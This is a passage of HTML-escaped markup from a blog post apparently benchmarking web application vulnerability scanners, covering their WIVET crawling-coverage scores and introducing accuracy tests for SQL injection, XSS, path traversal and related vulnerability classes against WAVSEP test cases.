  &lt;td style=&quot;border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 426.1pt;&quot; valign=&quot;top&quot; width=&quot;568&quot;&gt;&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;span style=&quot;color: white;&quot;&gt;Although users that can afford &quot;training&quot; the scanner
  to recognize the URL and input sources in the application (by using it as a
  proxy, for example) don&#39;t necessarily require enhanced crawling coverage, &lt;b&gt;organizations&lt;/b&gt;
  and individuals that &lt;b&gt;prefer&lt;/b&gt; or &lt;b&gt;require&lt;/b&gt; using the web
  application scanner in an &lt;b&gt;automated manner&lt;/b&gt; (&lt;b&gt;point-and-shoot&lt;/b&gt;)
  should consider the crawling coverage / input vector extraction to be of &lt;b&gt;highest
  importance&lt;/b&gt;, &lt;b&gt;second only&lt;/b&gt; to the support of the scanner for testing
  the necessary input delivery vectors.&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
 &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;As mentioned earlier, in order to evaluate these aspects in
scanners, I used a project called &lt;/span&gt;&lt;a href=&quot;http://code.google.com/p/wivet/&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;WIVET&lt;/span&gt;&lt;/b&gt;&lt;/a&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt; (Web Input Vector Extractor Teaser); The WIVET project is a
benchmarking project that was written by &lt;/span&gt;&lt;a href=&quot;http://twitter.com/bedirhanurgun/&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Bedirhan
Urgun&lt;/span&gt;&lt;/a&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;, and released under the GPL2
license. &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;The project is implemented as a web application which aims
to &quot;statistically analyze web link extractors&quot;, and measures the
amount of input vectors extracted by each scanner scanning the WIVET website.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;;&quot;&gt;&lt;b&gt;Plainly speaking, the project simply measures how well a scanner is able to crawl the application, and how well can it locate input vectors, by presenting a collection of challenges that contain links, parameters and input delivery methods that the crawling process should locate and extract.&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;In order for WIVET to work, the scanner must crawl the
application while consistently using the same session identifier in its
crawling requests, and while avoiding the 100.php logout page (which
initializes the session, and thus the results).&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;The results can then be viewed by accessing the application
index page, while using the session identifier used during the scan.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;During the tests I used a variety of workarounds designed to
&quot;assist&quot; scanners with missing proxy/cookie customization features to
scan WIVET, usually by scanning a proxy that forwarded the communication to
WIVET while adding consistent session identifiers and restricting the access to
the logout page.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;The scan configuration used with each scanner against WIVET
was documented in detail in the scanners &quot;scan log&quot;, and the comparison
of the scanners&#39; WIVET score is presented in the following section of
sectoolmarket:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;a href=&quot;http://sectoolmarket.com/wivet-score-unified-list.html&quot;&gt;http://sectoolmarket.com/wivet-score-unified-list.html&lt;/a&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt; &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;font-family: inherit;&quot;&gt;&lt;b&gt;&lt;u&gt;Result Update (29/03/2014):&lt;/u&gt;&amp;nbsp;&lt;/b&gt;the impressive&lt;b&gt;&amp;nbsp;96%&lt;/b&gt;&amp;nbsp;result of Webinspect can be achieved by selecting the &quot;&lt;b&gt;&lt;u&gt;depth first&lt;/u&gt;&lt;/b&gt;&quot; mode in the scan wizard. The&amp;nbsp;&lt;b&gt;default&amp;nbsp;option&amp;nbsp;&lt;/b&gt;in the wizard is slightly&amp;nbsp;&lt;b&gt;less efficient,&amp;nbsp;&lt;/b&gt;but still yields a great result that competes with the best result of any other scanner (&lt;b&gt;94%&lt;/b&gt;).&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;The WIVET Score of Web Application Scanners – Commercial
Tools &amp;amp; SAAS&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &#39;Times New Roman&#39;, serif; font-size: 12pt;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjNUql9B6ZHPie6LYAqkNYLTXC-mOrFNjtIsz9onKrl5mf2MawGFqqVP_X2SiAfq92hw1o5zo2y0AttqFQ7hycqC3dtE_EYOU6HI7Bq5NYBWcP3dXv537SDK0n-bZFWFW5Nyj7DpL4642Y/s1600/WIVET-wavsep-results-2014-commercial.png&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjNUql9B6ZHPie6LYAqkNYLTXC-mOrFNjtIsz9onKrl5mf2MawGFqqVP_X2SiAfq92hw1o5zo2y0AttqFQ7hycqC3dtE_EYOU6HI7Bq5NYBWcP3dXv537SDK0n-bZFWFW5Nyj7DpL4642Y/s1600/WIVET-wavsep-results-2014-commercial.png&quot; height=&quot;202&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span style=&quot;font-family: &#39;Times New Roman&#39;, serif; font-size: 12pt;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &#39;Times New Roman&#39;, serif; font-size: 12pt;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &#39;Times New Roman&#39;, serif; font-size: 12pt;&quot;&gt;Due to technical difficulties and time constraints the WIVET
results of &lt;/span&gt;&lt;b style=&quot;font-family: &#39;Times New Roman&#39;, serif; font-size: 12pt;&quot;&gt;ScanToSecure&lt;/b&gt;&lt;span style=&quot;font-family: &#39;Times New Roman&#39;, serif; font-size: 12pt;&quot;&gt; are not &lt;/span&gt;&lt;b style=&quot;font-family: &#39;Times New Roman&#39;, serif; font-size: 12pt;&quot;&gt;yet&lt;/b&gt;&lt;span style=&quot;font-family: &#39;Times New Roman&#39;, serif; font-size: 12pt;&quot;&gt; included, it can be assumed
to have the same score of Netsparker, since this is the engine at its core.&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;The WIVET Score of Web Application Scanners – Free and Open
Source Tools&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; text-align: center; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-no-proof: yes;&quot;&gt;&lt;!--[if gte vml 1]&gt;&lt;v:shape id=&quot;Picture_x0020_16&quot;
 o:spid=&quot;_x0000_i1055&quot; type=&quot;#_x0000_t75&quot; style=&#39;width:414.75pt;height:215.25pt;
 visibility:visible;mso-wrap-style:square&#39;&gt;
 &lt;v:imagedata src=&quot;file:///C:\Users\SHAY~1.CHE\AppData\Local\Temp\msohtmlclip1\01\clip_image023.png&quot;
  o:title=&quot;&quot;/&gt;
&lt;/v:shape&gt;&lt;![endif]--&gt;&lt;!--[if !vml]--&gt;&lt;!--[endif]--&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEigg7tabna6GiB4G7xHDSZNJfG1kTS2Ynoyw4xIuu3A5_442q5SOY8icWgCcMMGjHzxwq8ArgUy0iSv9qzmxv_-BjLK-iWBAWdVuYRKebDJ5yUHBd-G0yEM1cLPzWGMldaeeGfBigaYgOY/s1600/%25285%2529+Test+2-+Opensource+-+WIVET+Coverage.png&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEigg7tabna6GiB4G7xHDSZNJfG1kTS2Ynoyw4xIuu3A5_442q5SOY8icWgCcMMGjHzxwq8ArgUy0iSv9qzmxv_-BjLK-iWBAWdVuYRKebDJ5yUHBd-G0yEM1cLPzWGMldaeeGfBigaYgOY/s1600/%25285%2529+Test+2-+Opensource+-+WIVET+Coverage.png&quot; height=&quot;330&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;The WIVET Score of Web Application Scanners – Unified List&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqQKLel8JINVLn_M4loSMnLWvLV_cCujj2TMleQBLyqYgmI0_G_m0YNiaKN7EmgWluuxkA0Wvu_xAZTyRLrlqbJT0dufs9CdhlHGWkOSFlvbEZRDVp4u9S1T5S1Hy_akDFIXOqX4F_cyQ/s1600/WIVET-wavsep-results-2014-unified.png&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqQKLel8JINVLn_M4loSMnLWvLV_cCujj2TMleQBLyqYgmI0_G_m0YNiaKN7EmgWluuxkA0Wvu_xAZTyRLrlqbJT0dufs9CdhlHGWkOSFlvbEZRDVp4u9S1T5S1Hy_akDFIXOqX4F_cyQ/s1600/WIVET-wavsep-results-2014-unified.png&quot; height=&quot;410&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;
&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; text-align: center; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-no-proof: yes;&quot;&gt;&lt;!--[if gte vml 1]&gt;&lt;v:shape id=&quot;Picture_x0020_18&quot;
 o:spid=&quot;_x0000_i1054&quot; type=&quot;#_x0000_t75&quot; style=&#39;width:414.75pt;height:260.25pt;
 visibility:visible;mso-wrap-style:square&#39;&gt;
 &lt;v:imagedata src=&quot;file:///C:\Users\SHAY~1.CHE\AppData\Local\Temp\msohtmlclip1\01\clip_image025.png&quot;
  o:title=&quot;&quot;/&gt;
&lt;/v:shape&gt;&lt;![endif]--&gt;&lt;!--[if !vml]--&gt;&lt;!--[endif]--&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &#39;Times New Roman&#39;, serif; font-size: 12pt;&quot;&gt;Although the scan success rate was much higher than in previous
years, still, some of the scanners were not able to scan this platform despite
all my efforts. The score of these projects will be updated as soon as they
enhance their crawling mechanisms enough to scan WIVET.&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;It&#39;s crucial to remind the reader that scanners with
burp-log parsing features (such sqlmap and IronWASP) can effectively be
assigned with the WIVET score of burp, and also that scanners with internal
proxy features (such as ZAP, Burp, etc) can be used with the crawling
mechanisms of other scanners (such as Netsparker CE).&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Thus, any scanner that supports any of those features can be
artificially &quot;enhanced&quot; and assigned the WIVET score of any other scanner
in the possession of the tester.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b style=&quot;font-family: &#39;Times New Roman&#39;, serif;&quot;&gt;&lt;u&gt;&lt;span style=&quot;font-size: x-large;&quot;&gt;9. Introduction to the Accuracy Assessments&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;The following sections presents the results of the detection
accuracy assessments performed for &lt;b&gt;*&lt;a href=&quot;https://www.owasp.org/index.php/Unvalidated_Redirects_and_Forwards_Cheat_Sheet&quot;&gt;Unvalidated
Redirect&lt;/a&gt;&lt;/b&gt;*, *&lt;b&gt;&lt;a href=&quot;https://www.owasp.org/index.php/4.3.4_Review_Old,_Backup_and_Unreferenced_Files_for_Sensitive_Information_(OTG-CONFIG-004)&quot;&gt;Old,
Backup and Unreferenced Files&lt;/a&gt;&lt;/b&gt;*, &lt;b&gt;*&lt;a href=&quot;https://www.owasp.org/index.php/Testing_for_Path_Traversal_(OWASP-AZ-001)&quot;&gt;Path
Traversal / LFI&lt;/a&gt;*&lt;/b&gt;, &lt;b&gt;*&lt;a href=&quot;https://www.netsparker.com/xss-via-remote-file-inclusion/&quot;&gt;(XSS via)
Remote File Inclusion&lt;/a&gt;*&lt;/b&gt;, &lt;b&gt;*&lt;a href=&quot;https://www.owasp.org/index.php/Testing_for_Reflected_Cross_site_scripting_(OWASP-DV-001)&quot;&gt;Reflected
XSS&lt;/a&gt;*&lt;/b&gt; and &lt;b&gt;*&lt;a href=&quot;https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OWASP-DV-005)&quot;&gt;SQL
Injection&lt;/a&gt;*&lt;/b&gt;, six of the most commonly supported features in web
application scanners.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Since two of these assessments are *&lt;b&gt;NEW&lt;/b&gt;* to this
yearly benchmark (the backup files and unvalidated redirect accuracy
assessments - which were not disclosed to the various vendors prior to the
publication of this benchmark), two more &lt;b&gt;were&lt;/b&gt; new in the 2012 benchmark
(the path traversal/LFI and the remote file inclusion accuracy assessments),
and two existed in the benchmark from day one (SQL injection and reflected XSS)
– there&#39;s an interesting combination of results that can help assess the
overall scanner&#39;s performance.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Sure - the detection accuracy of a specific exposure might
not reflect the overall condition of the scanner on its own, but the careful
reader can go back and &lt;b&gt;analyze&lt;/b&gt; &lt;b&gt;previous benchmarks&lt;/b&gt; to &lt;b&gt;identify
patterns&lt;/b&gt;, and as always, these results serve as a crucial indicator for how
good a scanner is at detecting specific vulnerability instances. &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;The various assessments were performed against the various
test cases of WAVSEP v1.5, which emulate different &lt;b&gt;common&lt;/b&gt; test case
scenarios for generic technologies.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Reasoning&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;:
a scanner that is not accurate enough will not be able to identify many
exposures, and might classify non-vulnerable entry points as vulnerable. These
tests aim to assess how good is each tool at detecting the vulnerabilities it
claims to support, in a&lt;b&gt; supported input vector, &lt;/b&gt;which is located in&lt;b&gt; a
known entry point&lt;/b&gt;, without any restrictions that can prevent the tool from
operating properly.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
